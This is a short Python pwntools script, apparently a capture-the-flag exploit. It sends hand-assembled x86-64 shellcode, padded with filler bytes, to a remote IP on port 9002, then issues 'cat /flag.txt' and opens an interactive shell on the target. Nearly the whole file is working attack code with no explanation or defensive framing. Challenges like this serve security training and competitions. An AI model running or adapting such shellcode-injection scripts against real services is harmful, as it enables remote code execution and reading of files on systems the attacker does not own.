#!/usr/bin/env python

from pwn import *
import struct

'''
generated from exploit.asm

     nasm -f bin -o sc exploit.asm
     ndisasm -b64 sc
'''

sc = '\x48\x8B\x1C\x25\x60\x20\x60\x00\x48\x81\xEB\x50\x72\x0F\x00\x48\x89\xD9\x48\x81\xC1\xC5\xB8\x08\x00\x48\x89\x0C\x25\x00\x21\x60\x00\x48\x89\xD9\x48\x81\xC1\x16\x52\x04\x00\x48\x89\x0C\x25\x08\x21\x60\x00\xEB\x28\x48\x8B\x7D\xD4\x5E\xBA\x7D\x00\x00\x00\xB8\x01\x00\x00\x00\x0F\x05\x48\x8B\x7D\xD4\xBE\x00\x21\x60\x00\xBA\x10\x00\x00\x00\xB8\x01\x00\x00\x00\x0F\x05\xEB\xFE\xE8\xD3\xFF\xFF\xFF\x0A\x88\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42'

p = remote('35.170.14.27', 9002)

p.send(p32(len(sc)))
p.send(sc)

p.sendline("cat /flag.txt")

p.interactive()

